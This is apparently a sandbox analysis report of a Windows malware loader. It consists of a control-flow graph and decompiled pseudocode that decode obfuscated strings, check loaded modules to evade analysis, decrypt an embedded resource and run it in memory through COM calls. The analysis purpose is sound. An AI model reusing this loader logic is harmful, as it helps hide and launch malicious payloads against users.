                                                                                                                                                                      control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 FindCloseChangeNotification GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 27 401ed6-401eed call 40ba30 7->27 28 401eef 7->28 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 18 401c98-401c9a 16->18 20 401c7d-401c83 17->20 21 401c8f-401c91 17->21 22 401cb0-401cce call 401650 18->22 23 401c9c-401caf CloseHandle 18->23 20->16 25 401c85-401c8d 20->25 21->18 32 401cd0-401cd4 22->32 25->14 25->21 31 401ef3-401f1a call 401300 SizeofResource 27->31 28->31 38 401f1c-401f2f 31->38 39 401f5f-401f69 31->39 36 401cf0-401cf2 32->36 37 401cd6-401cd8 32->37 42 401cf5-401cf7 36->42 40 401cda-401ce0 37->40 41 401cec-401cee 37->41 43 401f33-401f5d call 401560 38->43 44 401f73-401f75 39->44 45 401f6b-401f72 39->45 40->36 46 401ce2-401cea 40->46 41->42 42->23 47 401cf9-401d09 Module32Next 42->47 43->39 49 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 44->49 50 401f77-401f8d call 401560 44->50 45->44 46->32 46->41 47->7 51 401d0f 47->51 49->5 86 4021aa-4021c0 49->86 50->49 55 401d10-401d2e call 401650 51->55 60 401d30-401d34 55->60 62 401d50-401d52 60->62 63 401d36-401d38 60->63 68 401d55-401d57 62->68 66 401d3a-401d40 63->66 67 401d4c-401d4e 63->67 66->62 70 401d42-401d4a 66->70 67->68 68->23 71 401d5d-401d7b call 401650 68->71 70->60 70->67 77 401d80-401d84 71->77 79 401da0-401da2 77->79 80 401d86-401d88 77->80 81 401da5-401da7 79->81 83 401d8a-401d90 80->83 84 401d9c-401d9e 80->84 81->23 85 401dad-401dbd Module32Next 81->85 83->79 87 401d92-401d9a 83->87 84->81 85->7 85->55 89 4021c6-4021ca 86->89 90 40246a-402470 86->90 87->77 87->84 89->90 91 4021d0-402217 call 4018f0 89->91 92 402472-402475 90->92 93 40247a-402480 90->93 98 40221d-40223d 91->98 99 40244f-40245f 91->99 92->93 93->5 94 402482-402487 93->94 94->5 98->99 103 402243-402251 98->103 99->90 100 402461-402467 call 40b6b5 99->100 100->90 103->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 103->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-40234d call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 154 40234e call 246d006 122->154 155 40234e call 246d01d 122->155 123->122 127 402350-402352 128 402354-402355 SafeArrayDestroy 127->128 129 40235b-402361 127->129 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-40238f call 4018d0 133->135 134->135 152 402390 call 246d006 135->152 153 402390 call 246d01d 135->153 138 402392-4023a2 SafeArrayCreateVector 139 4023a4-4023a9 call 40ad90 138->139 140 4023ae-4023b4 138->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 VariantClear * 2 call 4019a0 142->144 143->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99 152->138 153->138 154->127 155->127
                                                                                                                                                                      C-Code - Quality: 77%
                                                                                                                                                                      			E004019F0(void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t337;
				void* _t340;
				int _t341;
				CHAR* _t344;
				intOrPtr* _t349;
				int _t350;
				long _t352;
				signed int _t354;
				intOrPtr _t358;
				long _t359;
				CHAR* _t364;
				struct HINSTANCE__* _t365;
				CHAR* _t366;
				_Unknown_base(*)()* _t367;
				int _t368;
				int _t369;
				int _t370;
				intOrPtr* _t376;
				int _t378;
				intOrPtr _t379;
				intOrPtr* _t381;
				int _t383;
				intOrPtr* _t384;
				int _t385;
				int _t396;
				int _t399;
				int _t402;
				int _t405;
				intOrPtr* _t407;
				int _t413;
				int _t415;
				void* _t421;
				int _t422;
				int _t424;
				intOrPtr* _t428;
				intOrPtr _t429;
				intOrPtr* _t431;
				int _t432;
				int _t435;
				intOrPtr* _t437;
				int _t438;
				intOrPtr* _t439;
				int _t440;
				int _t442;
				signed int _t448;
				signed int _t451;
				signed int _t452;
				int _t469;
				int _t471;
				int _t482;
				signed int _t486;
				intOrPtr* _t488;
				intOrPtr* _t490;
				intOrPtr* _t492;
				intOrPtr _t493;
				void* _t494;
				struct HRSRC__* _t497;
				void* _t514;
				int _t519;
				intOrPtr* _t520;
				void* _t524;
				void* _t525;
				struct HINSTANCE__* _t526;
				intOrPtr _t527;
				void* _t531;
				void* _t535;
				struct HRSRC__* _t536;
				intOrPtr* _t537;
				intOrPtr* _t539;
				int _t542;
				int _t543;
				intOrPtr* _t547;
				intOrPtr* _t548;
				intOrPtr* _t549;
				intOrPtr* _t550;
				void* _t551;
				intOrPtr _t552;
				int _t555;
				void* _t556;
				void* _t557;
				void* _t558;
				void* _t559;
				void* _t560;
				void* _t561;
				void* _t562;
				intOrPtr* _t563;
				void* _t564;
				void* _t565;
				void* _t566;
				void* _t567;

				_t567 = __eflags;
				_t494 = __edx;
				__imp__OleInitialize(0); // executed
				 *((char*)(_t556 + 0x18)) = 0xe0;
				 *((char*)(_t556 + 0x19)) = 0x3b;
				 *((char*)(_t556 + 0x1a)) = 0x8d;
				 *((char*)(_t556 + 0x1b)) = 0x2a;
				 *((char*)(_t556 + 0x1c)) = 0xa2;
				 *((char*)(_t556 + 0x1d)) = 0x2a;
				 *((char*)(_t556 + 0x1e)) = 0x2a;
				 *((char*)(_t556 + 0x1f)) = 0x41;
				 *((char*)(_t556 + 0x20)) = 0xd3;
				 *((char*)(_t556 + 0x21)) = 0x20;
				 *((char*)(_t556 + 0x22)) = 0x64;
				 *((char*)(_t556 + 0x23)) = 6;
				 *((char*)(_t556 + 0x24)) = 0x8a;
				 *((char*)(_t556 + 0x25)) = 0xf7;
				 *((char*)(_t556 + 0x26)) = 0x3d;
				 *((char*)(_t556 + 0x27)) = 0x9d;
				 *((char*)(_t556 + 0x28)) = 0xd9;
				 *((char*)(_t556 + 0x29)) = 0xee;
				 *((char*)(_t556 + 0x2a)) = 0x15;
				 *((char*)(_t556 + 0x2b)) = 0x68;
				 *((char*)(_t556 + 0x2c)) = 0xf4;
				 *((char*)(_t556 + 0x2d)) = 0x76;
				 *((char*)(_t556 + 0x2e)) = 0xb9;
				 *((char*)(_t556 + 0x2f)) = 0x34;
				 *((char*)(_t556 + 0x30)) = 0xbf;
				 *((char*)(_t556 + 0x31)) = 0x1e;
				 *((char*)(_t556 + 0x32)) = 0xe7;
				 *((char*)(_t556 + 0x33)) = 0x78;
				 *((char*)(_t556 + 0x34)) = 0x98;
				 *((char*)(_t556 + 0x35)) = 0xe9;
				 *((char*)(_t556 + 0x36)) = 0x6f;
				 *((char*)(_t556 + 0x37)) = 0xb4;
				 *((char*)(_t556 + 0x38)) = 0;
				_push(E00401650(_t556 + 0x14, _t556 + 0x114));
				_t337 = E0040B99E(0, _t494, _t524, _t535, _t567);
				_t557 = _t556 + 0xc;
				if(_t337 == 0x41b2a0) {
					L80:
					__eflags = 0;
					return 0;
				} else {
					_t340 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
					_t525 = _t340;
					 *((intOrPtr*)(_t557 + 0x280)) = 0x224;
					 *((char*)(_t557 + 0x64)) = 0xce;
					 *((char*)(_t557 + 0x65)) = 0x27;
					 *((char*)(_t557 + 0x66)) = 0x9c;
					 *((char*)(_t557 + 0x67)) = 0x1a;
					 *((char*)(_t557 + 0x68)) = 0x95;
					 *((char*)(_t557 + 0x69)) = 0x2e;
					 *((char*)(_t557 + 0x6a)) = 0x22;
					 *((char*)(_t557 + 0x6b)) = 0x57;
					 *((char*)(_t557 + 0x6c)) = 0x91;
					 *((char*)(_t557 + 0x6d)) = 0x21;
					 *((char*)(_t557 + 0x6e)) = 0x57;
					 *((char*)(_t557 + 0x6f)) = 0x3a;
					 *((char*)(_t557 + 0x70)) = 0xf8;
					 *((char*)(_t557 + 0x71)) = 0x98;
					 *((char*)(_t557 + 0x72)) = 0x5b;
					 *((char*)(_t557 + 0x73)) = 0xf4;
					 *((char*)(_t557 + 0x74)) = 0xb5;
					 *((char*)(_t557 + 0x75)) = 0x87;
					 *((char*)(_t557 + 0x76)) = 0x7b;
					 *((char*)(_t557 + 0x77)) = 0xf;
					 *((char*)(_t557 + 0x78)) = 0xf4;
					 *((char*)(_t557 + 0x79)) = 0x76;
					 *((char*)(_t557 + 0x7a)) = 0xb9;
					 *((char*)(_t557 + 0x7b)) = 0x34;
					 *((char*)(_t557 + 0x7c)) = 0xbf;
					 *((char*)(_t557 + 0x7d)) = 0x1e;
					 *((char*)(_t557 + 0x7e)) = 0xe7;
					 *((char*)(_t557 + 0x7f)) = 0x78;
					 *((char*)(_t557 + 0x80)) = 0x98;
					 *((char*)(_t557 + 0x81)) = 0xe9;
					 *((char*)(_t557 + 0x82)) = 0x6f;
					 *((char*)(_t557 + 0x83)) = 0xb4;
					 *((char*)(_t557 + 0x84)) = 0;
					 *((char*)(_t557 + 0x18)) = 0xc0;
					 *((char*)(_t557 + 0x19)) = 0x38;
					 *((char*)(_t557 + 0x1a)) = 0x8d;
					 *((char*)(_t557 + 0x1b)) = 0x1f;
					 *((char*)(_t557 + 0x1c)) = 0x8e;
					 *((char*)(_t557 + 0x1d)) = 0x30;
					 *((char*)(_t557 + 0x1e)) = 0x65;
					 *((char*)(_t557 + 0x1f)) = 0x47;
					 *((char*)(_t557 + 0x20)) = 0xd3;
					 *((char*)(_t557 + 0x21)) = 0x29;
					 *((char*)(_t557 + 0x22)) = 0x3b;
					 *((char*)(_t557 + 0x23)) = 0x56;
					 *((char*)(_t557 + 0x24)) = 0xf8;
					 *((char*)(_t557 + 0x25)) = 0x98;
					 *((char*)(_t557 + 0x26)) = 0x5b;
					 *((char*)(_t557 + 0x27)) = 0xf4;
					 *((char*)(_t557 + 0x28)) = 0xb5;
					 *((char*)(_t557 + 0x29)) = 0x87;
					 *((char*)(_t557 + 0x2a)) = 0x7b;
					 *((char*)(_t557 + 0x2b)) = 0xf;
					 *((char*)(_t557 + 0x2c)) = 0xf4;
					 *((char*)(_t557 + 0x2d)) = 0x76;
					 *((char*)(_t557 + 0x2e)) = 0xb9;
					 *((char*)(_t557 + 0x2f)) = 0x34;
					 *((char*)(_t557 + 0x30)) = 0xbf;
					 *((char*)(_t557 + 0x31)) = 0x1e;
					 *((char*)(_t557 + 0x32)) = 0xe7;
					 *((char*)(_t557 + 0x33)) = 0x78;
					 *((char*)(_t557 + 0x34)) = 0x98;
					 *((char*)(_t557 + 0x35)) = 0xe9;
					 *((char*)(_t557 + 0x36)) = 0x6f;
					 *((char*)(_t557 + 0x37)) = 0xb4;
					 *((char*)(_t557 + 0x38)) = 0;
					_t341 = Module32First(_t525, _t557 + 0x278); // executed
					if(_t341 == 0) {
						L38:
						FindCloseChangeNotification(_t525); // executed
						_t526 = GetModuleHandleA(0);
						 *((char*)(_t557 + 0x1c)) = 0xfc;
						 *((char*)(_t557 + 0x1d)) = 0xb;
						 *((char*)(_t557 + 0x1e)) = 0xff;
						 *((char*)(_t557 + 0x1f)) = 0x75;
						 *((char*)(_t557 + 0x20)) = 0xe7;
						 *((char*)(_t557 + 0x21)) = 0x44;
						 *((char*)(_t557 + 0x22)) = 0x4b;
						 *((char*)(_t557 + 0x23)) = 0x23;
						 *((char*)(_t557 + 0x24)) = 0xbf;
						 *((char*)(_t557 + 0x25)) = 0x45;
						 *((char*)(_t557 + 0x26)) = 0x3b;
						 *((char*)(_t557 + 0x27)) = 0x56;
						 *((char*)(_t557 + 0x28)) = 0xf8;
						 *((char*)(_t557 + 0x29)) = 0x98;
						 *((char*)(_t557 + 0x2a)) = 0x5b;
						 *((char*)(_t557 + 0x2b)) = 0xf4;
						 *((char*)(_t557 + 0x2c)) = 0xb5;
						 *((char*)(_t557 + 0x2d)) = 0x87;
						 *((char*)(_t557 + 0x2e)) = 0x7b;
						 *((char*)(_t557 + 0x2f)) = 0xf;
						 *((char*)(_t557 + 0x30)) = 0xf4;
						 *((char*)(_t557 + 0x31)) = 0x76;
						 *((char*)(_t557 + 0x32)) = 0xb9;
						 *((char*)(_t557 + 0x33)) = 0x34;
						 *((char*)(_t557 + 0x34)) = 0xbf;
						 *((char*)(_t557 + 0x35)) = 0x1e;
						 *((char*)(_t557 + 0x36)) = 0xe7;
						 *((char*)(_t557 + 0x37)) = 0x78;
						 *((char*)(_t557 + 0x38)) = 0x98;
						 *((char*)(_t557 + 0x39)) = 0xe9;
						 *((char*)(_t557 + 0x3a)) = 0x6f;
						 *((char*)(_t557 + 0x3b)) = 0xb4;
						 *((char*)(_t557 + 0x3c)) = 0;
						_t344 = E00401650(_t557 + 0x18, _t557 + 0x158);
						_t558 = _t557 + 8;
						_t536 = FindResourceA(_t526, _t344, 0xa);
						 *(_t558 + 0x50) = _t536;
						_t551 = LoadResource(_t526, _t536);
						 *((intOrPtr*)(_t558 + 0x44)) = LockResource(_t551);
						_t349 = E0040B84D(0, _t557 + 0x18, _t526, SizeofResource(_t526, _t536)); // executed
						_push(0x40022);
						_t537 = _t349; // executed
						_t350 = E0040AF66(0, _t526, __eflags); // executed
						_t559 = _t558 + 8;
						 *(_t559 + 0x34) = _t350;
						__eflags = _t350;
						if(_t350 == 0) {
							 *(_t559 + 0x50) = 0;
						} else {
							E0040BA30(_t526, _t350, 0, 0x40022);
							_t486 =  *(_t559 + 0x40);
							_t559 = _t559 + 0xc;
							 *(_t559 + 0x50) = _t486;
						}
						E00401300( *(_t559 + 0x50));
						_t497 =  *(_t559 + 0x48);
						_t352 = SizeofResource(_t526, _t497);
						 *(_t559 + 0x40) = _t352;
						asm("cdq");
						_t354 = _t352 + (_t497 & 0x000003ff) >> 0xa;
						__eflags = _t354;
						if(_t354 > 0) {
							_t519 =  *(_t559 + 0x3c);
							_t482 = _t537 - _t519;
							__eflags = _t482;
							 *(_t559 + 0x34) = _t519;
							 *(_t559 + 0x88) = _t482;
							 *(_t559 + 0x38) = _t354;
							do {
								_t424 =  *(_t559 + 0x34);
								_push( *(_t559 + 0x88) + _t424);
								_push(0x400);
								_push(_t424);
								E00401560(0,  *((intOrPtr*)(_t559 + 0x54)));
								 *(_t559 + 0x34) =  *(_t559 + 0x34) + 0x400;
								_t179 = _t559 + 0x38;
								 *_t179 =  *(_t559 + 0x38) - 1;
								__eflags =  *_t179;
							} while ( *_t179 != 0);
						}
						_t448 =  *(_t559 + 0x40) & 0x800003ff;
						__eflags = _t448;
						if(_t448 < 0) {
							_t448 = (_t448 - 0x00000001 | 0xfffffc00) + 1;
							__eflags = _t448;
						}
						__eflags = _t448;
						if(_t448 > 0) {
							_t421 =  *(_t559 + 0x40) - _t448;
							_push(_t421 + _t537);
							_push(_t448);
							_t422 = _t421 +  *((intOrPtr*)(_t559 + 0x44));
							__eflags = _t422;
							_push(_t422);
							E00401560(0,  *((intOrPtr*)(_t559 + 0x58)));
						}
						E0040BA30(_t526,  *(_t559 + 0x3c), 0,  *(_t559 + 0x40));
						_t560 = _t559 + 0xc;
						FreeResource(_t551);
						_t552 =  *_t537;
						 *((intOrPtr*)(_t560 + 0x94)) = _t552;
						_t358 = E0040B84D(0,  *(_t559 + 0x40), _t526, _t552); // executed
						_t561 = _t560 + 4;
						 *((intOrPtr*)(_t561 + 0x40)) = _t358;
						_t359 = SizeofResource(_t526,  *(_t560 + 0x4c));
						_t527 =  *((intOrPtr*)(_t561 + 0x38));
						_t192 = _t537 + 4; // 0x4
						E0040AC60(_t527, _t561 + 0x98, _t192, _t359);
						E0040BA30(_t527, _t537, 0,  *((intOrPtr*)(_t561 + 0x50)));
						_t528 = _t527 + 0xe;
						 *((char*)(_t561 + 0x34)) = 0xce;
						 *((char*)(_t561 + 0x35)) = 0x27;
						 *((char*)(_t561 + 0x36)) = 0x9c;
						 *((char*)(_t561 + 0x37)) = 0x1a;
						 *((char*)(_t561 + 0x38)) = 0x95;
						 *((char*)(_t561 + 0x39)) = 0x21;
						 *((char*)(_t561 + 0x3a)) = 0x2e;
						 *((char*)(_t561 + 0x3b)) = 0xd;
						 *((char*)(_t561 + 0x3c)) = 0xdb;
						 *((char*)(_t561 + 0x3d)) = 0x29;
						 *((char*)(_t561 + 0x3e)) = 0x57;
						 *((char*)(_t561 + 0x3f)) = 0x56;
						 *((char*)(_t561 + 0x40)) = 0xf8;
						 *((char*)(_t561 + 0x41)) = 0x98;
						 *((char*)(_t561 + 0x42)) = 0x5b;
						 *((char*)(_t561 + 0x43)) = 0xf4;
						 *((char*)(_t561 + 0x44)) = 0xb5;
						 *((char*)(_t561 + 0x45)) = 0x87;
						 *((char*)(_t561 + 0x46)) = 0x7b;
						 *((char*)(_t561 + 0x47)) = 0xf;
						 *((char*)(_t561 + 0x48)) = 0xf4;
						 *((char*)(_t561 + 0x49)) = 0x76;
						 *((char*)(_t561 + 0x4a)) = 0xb9;
						 *((char*)(_t561 + 0x4b)) = 0x34;
						 *((char*)(_t561 + 0x4c)) = 0xbf;
						 *((char*)(_t561 + 0x4d)) = 0x1e;
						 *((char*)(_t561 + 0x4e)) = 0xe7;
						 *((char*)(_t561 + 0x4f)) = 0x78;
						 *((char*)(_t561 + 0x50)) = 0x98;
						 *((char*)(_t561 + 0x51)) = 0xe9;
						 *((char*)(_t561 + 0x52)) = 0x6f;
						 *((char*)(_t561 + 0x53)) = 0xb4;
						 *((char*)(_t561 + 0x54)) = 0;
						_t364 = E00401650(_t561 + 0x30, _t561 + 0x110);
						_t562 = _t561 + 0x24;
						_t365 = LoadLibraryA(_t364); // executed
						_t538 = _t365;
						 *((char*)(_t562 + 0x10)) = 0xe0;
						 *((char*)(_t562 + 0x11)) = 0x18;
						 *((char*)(_t562 + 0x12)) = 0xad;
						 *((char*)(_t562 + 0x13)) = 0x36;
						 *((char*)(_t562 + 0x14)) = 0x95;
						 *((char*)(_t562 + 0x15)) = 0x21;
						_t451 = _t562 + 0x134;
						 *((char*)(_t562 + 0x1e)) = 0x2a;
						 *((char*)(_t562 + 0x1f)) = 0x57;
						 *((char*)(_t562 + 0x20)) = 0xda;
						 *((char*)(_t562 + 0x21)) = 0xc;
						 *((char*)(_t562 + 0x22)) = 0x55;
						 *((char*)(_t562 + 0x23)) = 0x25;
						 *((char*)(_t562 + 0x24)) = 0x8c;
						 *((char*)(_t562 + 0x25)) = 0xf9;
						 *((char*)(_t562 + 0x26)) = 0x35;
						 *((char*)(_t562 + 0x27)) = 0x97;
						 *((char*)(_t562 + 0x28)) = 0xd0;
						 *((char*)(_t562 + 0x29)) = 0x87;
						 *((char*)(_t562 + 0x2a)) = 0x7b;
						 *((char*)(_t562 + 0x2b)) = 0xf;
						 *((char*)(_t562 + 0x2c)) = 0xf4;
						 *((char*)(_t562 + 0x2d)) = 0x76;
						 *((char*)(_t562 + 0x2e)) = 0xb9;
						 *((char*)(_t562 + 0x2f)) = 0x34;
						 *((char*)(_t562 + 0x30)) = 0xbf;
						 *((char*)(_t562 + 0x31)) = 0x1e;
						 *((char*)(_t562 + 0x32)) = 0xe7;
						 *((char*)(_t562 + 0x33)) = 0x78;
						 *((char*)(_t562 + 0x34)) = 0x98;
						 *((char*)(_t562 + 0x35)) = 0xe9;
						 *((char*)(_t562 + 0x36)) = 0x6f;
						 *((char*)(_t562 + 0x37)) = 0xb4;
						 *((char*)(_t562 + 0x38)) = 0;
						_t366 = E00401650(_t562 + 0x14, _t451);
						_t563 = _t562 + 8;
						_t367 = GetProcAddress(_t365, _t366);
						__eflags = _t367;
						_t452 = _t451 & 0xffffff00 | _t367 != 0x00000000;
						__eflags = _t452;
						 *(_t563 + 0x47) = _t452 == 0;
						 *0x423480 = _t367;
						 *((intOrPtr*)(_t563 + 0x80)) = 0;
						 *((intOrPtr*)(_t563 + 0x84)) = 0;
						 *((intOrPtr*)(_t563 + 0x4c)) = 0;
						 *(_t563 + 0x58) = 0;
						 *(_t563 + 0x54) = 0;
						__eflags = _t452;
						if(_t452 != 0) {
							_t368 =  *_t367(0x41b230, 0x41b220, _t563 + 0x80); // executed
							__eflags = _t368;
							if(_t368 >= 0) {
								__eflags =  *(_t563 + 0x47);
								if( *(_t563 + 0x47) == 0) {
									 *((intOrPtr*)(_t563 + 0x17c)) = _t563 + 0x17c;
									E004018F0( *((intOrPtr*)(_t563 + 0x38)), _t563 + 0x17c, _t563 + 0x17c,  *((intOrPtr*)(_t563 + 0x38)), 3);
									_t376 =  *((intOrPtr*)(_t563 + 0x80));
									_t378 =  *((intOrPtr*)( *((intOrPtr*)( *_t376 + 0xc))))(_t376,  *((intOrPtr*)(_t563 + 0x178)), 0x41b240, _t563 + 0x84); // executed
									__eflags = _t378;
									if(_t378 >= 0) {
										_t381 =  *((intOrPtr*)(_t563 + 0x84));
										_t383 =  *((intOrPtr*)( *((intOrPtr*)( *_t381 + 0x24))))(_t381, 0x41b210, 0x41b290, _t563 + 0x4c); // executed
										__eflags = _t383;
										if(_t383 >= 0) {
											_t384 =  *((intOrPtr*)(_t563 + 0x4c));
											_t385 =  *((intOrPtr*)( *((intOrPtr*)( *_t384 + 0x28))))(_t384); // executed
											__eflags = _t385;
											if(_t385 >= 0) {
												 *((intOrPtr*)(_t563 + 0x38)) = 0;
												E00401870(_t563 + 0x44, _t552, "_._");
												_t539 = __imp__#8;
												 *((intOrPtr*)(_t563 + 0x40)) = 0;
												 *_t539(_t563 + 0x94);
												E00401870(_t563 + 0x3c, _t552, "___");
												 *_t539(_t563 + 0xa4);
												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t563 + 0x4c)))) + 0x34))))( *((intOrPtr*)(_t563 + 0x50)), E004018D0(_t563 + 0x58)); // executed
												_t542 =  *(_t563 + 0x58);
												__eflags = _t542;
												if(_t542 == 0) {
													E0040AD90(0x80004003);
												}
												_t396 =  *((intOrPtr*)( *((intOrPtr*)( *_t542))))(_t542, 0x41b270, E004018D0(_t563 + 0x54));
												 *((intOrPtr*)(_t563 + 0x94)) = _t552 + 0xfffffff2;
												 *((intOrPtr*)(_t563 + 0x98)) = 0;
												__imp__#15(0x11, 1, _t563 + 0x88); // executed
												_t543 = _t396;
												 *((intOrPtr*)(_t563 + 0x50)) = 0;
												__imp__#23(_t543, _t563 + 0x48);
												E0040B350(0, _t528, _t543,  *((intOrPtr*)(_t563 + 0x48)), _t528, _t552 + 0xfffffff2);
												_t564 = _t563 + 0xc;
												__imp__#24(_t543);
												_t399 =  *(_t564 + 0x54);
												__eflags = _t399;
												if(_t399 == 0) {
													_t399 = E0040AD90(0x80004003);
												}
												 *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xb4))))(_t399, _t543, E004018D0(_t564 + 0x34)); // executed
												__eflags = _t543;
												if(_t543 != 0) {
													__imp__#16(_t543); // executed
												}
												_t402 =  *(_t564 + 0x34);
												__eflags = _t402;
												if(_t402 == 0) {
													_t402 = E0040AD90(0x80004003);
												}
												_t469 =  *(_t564 + 0x40);
												_t555 = _t402;
												__eflags = _t469;
												if(_t469 == 0) {
													_t531 = 0;
													__eflags = 0;
												} else {
													_t531 =  *_t469;
												}
												 *((intOrPtr*)( *((intOrPtr*)( *_t402 + 0x44))))(_t555, _t531, E004018D0(_t564 + 0x3c)); // executed
												__imp__#411(0xc, 0, 0);
												_t471 =  *(_t564 + 0x3c);
												__eflags = _t471;
												if(_t471 == 0) {
													E0040AD90(0x80004003);
												}
												_t405 =  *(_t564 + 0x38);
												__eflags = _t405;
												if(_t405 == 0) {
													_t514 = 0;
													__eflags = 0;
												} else {
													_t514 =  *_t405;
												}
												_t563 = _t564 - 0x10;
												_t407 = _t563;
												 *_t407 =  *((intOrPtr*)(_t564 + 0x94));
												 *((intOrPtr*)(_t407 + 4)) =  *((intOrPtr*)(_t563 + 0xb0));
												 *((intOrPtr*)(_t407 + 8)) =  *((intOrPtr*)(_t563 + 0xb8));
												_t528 =  *((intOrPtr*)(_t563 + 0xc0));
												 *((intOrPtr*)(_t407 + 0xc)) =  *((intOrPtr*)(_t563 + 0xc0));
												 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 0xe4))))(_t471, _t514, 0x118, 0, 0, _t564 + 0xa4);
												_t538 = __imp__#9; // 0x742dcf00
												_t538->i(_t563 + 0xa4);
												E004019A0(_t563 + 0x38);
												_t538->i(_t563 + 0x94);
												_t413 =  *(_t563 + 0x3c);
												__eflags = _t413;
												if(_t413 != 0) {
													 *((intOrPtr*)( *((intOrPtr*)( *_t413 + 8))))(_t413);
												}
												E004019A0(_t563 + 0x40);
												_t415 =  *(_t563 + 0x34);
												__eflags = _t415;
												if(_t415 != 0) {
													 *((intOrPtr*)( *((intOrPtr*)( *_t415 + 8))))(_t415);
												}
											}
										}
									}
									_t379 =  *((intOrPtr*)(_t563 + 0x174));
									__eflags = _t379 - _t563 + 0x178;
									if(__eflags != 0) {
										_push(_t379);
										E0040B6B5(0, _t528, _t538, __eflags);
										_t563 = _t563 + 4;
									}
								}
							}
							_t369 =  *(_t563 + 0x54);
							__eflags = _t369;
							if(_t369 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t369 + 8))))(_t369);
							}
							_t370 =  *(_t563 + 0x58);
							__eflags = _t370;
							if(_t370 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t370 + 8))))(_t370);
							}
						}
						goto L80;
					} else {
						_t428 = E00401650(_t557 + 0x60, _t557 + 0xd4);
						_t565 = _t557 + 8;
						_t547 = _t428;
						_t520 = _t565 + 0x298;
						while(1) {
							_t429 =  *_t520;
							if(_t429 !=  *_t547) {
								break;
							}
							if(_t429 == 0) {
								L7:
								_t429 = 0;
							} else {
								_t493 =  *((intOrPtr*)(_t520 + 1));
								if(_t493 !=  *((intOrPtr*)(_t547 + 1))) {
									break;
								} else {
									_t520 = _t520 + 2;
									_t547 = _t547 + 2;
									if(_t493 != 0) {
										continue;
									} else {
										goto L7;
									}
								}
							}
							L9:
							if(_t429 != 0) {
								_t431 = E00401650(_t565 + 0x14, _t565 + 0xb4);
								_t557 = _t565 + 8;
								_t548 = _t431;
								_t488 = _t557 + 0x298;
								while(1) {
									_t432 =  *_t488;
									__eflags = _t432 -  *_t548;
									if(_t432 !=  *_t548) {
										break;
									}
									__eflags = _t432;
									if(_t432 == 0) {
										L16:
										_t432 = 0;
									} else {
										_t432 =  *((intOrPtr*)(_t488 + 1));
										__eflags = _t432 -  *((intOrPtr*)(_t548 + 1));
										if(_t432 !=  *((intOrPtr*)(_t548 + 1))) {
											break;
										} else {
											_t488 = _t488 + 2;
											_t548 = _t548 + 2;
											__eflags = _t432;
											if(_t432 != 0) {
												continue;
											} else {
												goto L16;
											}
										}
									}
									L18:
									__eflags = _t432;
									if(_t432 == 0) {
										goto L10;
									} else {
										_t435 = Module32Next(_t525, _t557 + 0x278);
										__eflags = _t435;
										if(_t435 != 0) {
											do {
												_t437 = E00401650(_t557 + 0x60, _t557 + 0xd4);
												_t566 = _t557 + 8;
												_t549 = _t437;
												_t490 = _t566 + 0x298;
												while(1) {
													_t438 =  *_t490;
													__eflags = _t438 -  *_t549;
													if(_t438 !=  *_t549) {
														break;
													}
													__eflags = _t438;
													if(_t438 == 0) {
														L26:
														_t438 = 0;
													} else {
														_t438 =  *((intOrPtr*)(_t490 + 1));
														__eflags = _t438 -  *((intOrPtr*)(_t549 + 1));
														if(_t438 !=  *((intOrPtr*)(_t549 + 1))) {
															break;
														} else {
															_t490 = _t490 + 2;
															_t549 = _t549 + 2;
															__eflags = _t438;
															if(_t438 != 0) {
																continue;
															} else {
																goto L26;
															}
														}
													}
													L28:
													__eflags = _t438;
													if(_t438 == 0) {
														goto L10;
													} else {
														_t439 = E00401650(_t566 + 0x14, _t566 + 0xb4);
														_t557 = _t566 + 8;
														_t550 = _t439;
														_t492 = _t557 + 0x298;
														while(1) {
															_t440 =  *_t492;
															__eflags = _t440 -  *_t550;
															if(_t440 !=  *_t550) {
																break;
															}
															__eflags = _t440;
															if(_t440 == 0) {
																L34:
																_t440 = 0;
															} else {
																_t440 =  *((intOrPtr*)(_t492 + 1));
																__eflags = _t440 -  *((intOrPtr*)(_t550 + 1));
																if(_t440 !=  *((intOrPtr*)(_t550 + 1))) {
																	break;
																} else {
																	_t492 = _t492 + 2;
																	_t550 = _t550 + 2;
																	__eflags = _t440;
																	if(_t440 != 0) {
																		continue;
																	} else {
																		goto L34;
																	}
																}
															}
															L36:
															__eflags = _t440;
															if(_t440 == 0) {
																goto L10;
															} else {
																goto L37;
															}
															goto L81;
														}
														asm("sbb eax, eax");
														asm("sbb eax, 0xffffffff");
														goto L36;
													}
													goto L81;
												}
												asm("sbb eax, eax");
												asm("sbb eax, 0xffffffff");
												goto L28;
												L37:
												_t442 = Module32Next(_t525, _t557 + 0x278);
												__eflags = _t442;
											} while (_t442 != 0);
										}
										goto L38;
									}
									goto L81;
								}
								asm("sbb eax, eax");
								asm("sbb eax, 0xffffffff");
								goto L18;
							} else {
								L10:
								CloseHandle(_t525);
								return 0;
							}
							goto L81;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						goto L9;
					}
				}
				L81:
